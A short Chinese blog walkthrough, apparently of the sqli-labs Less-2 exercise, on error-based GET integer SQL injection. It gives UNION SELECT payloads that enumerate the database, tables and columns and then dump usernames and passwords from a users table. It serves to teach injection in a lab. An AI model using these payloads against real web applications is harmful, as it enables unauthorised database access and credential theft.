【SQL注入】Less-2错误型GET整型注入

Less-2错误型GET整型注入

什么是整形注入?可以理解位提交的URL参数为整数类型。

实验漏洞复现介绍

该实验与Less-1错误型GET单引号字符型注入 区别在于,构建payload时去掉'单引号

1、爆开数据库

payload

?id=0 union select 1,2,database() --+

2、爆开数据表

payload

?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

3、表开数据列(字段)

payload

?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

4、爆开数据值

payload

?id=0 union select 1,group_concat(username,0x3a,password),3 from users--+

猜你喜欢

转载自blog.csdn.net/Mitchell_Donovan/article/details/115335714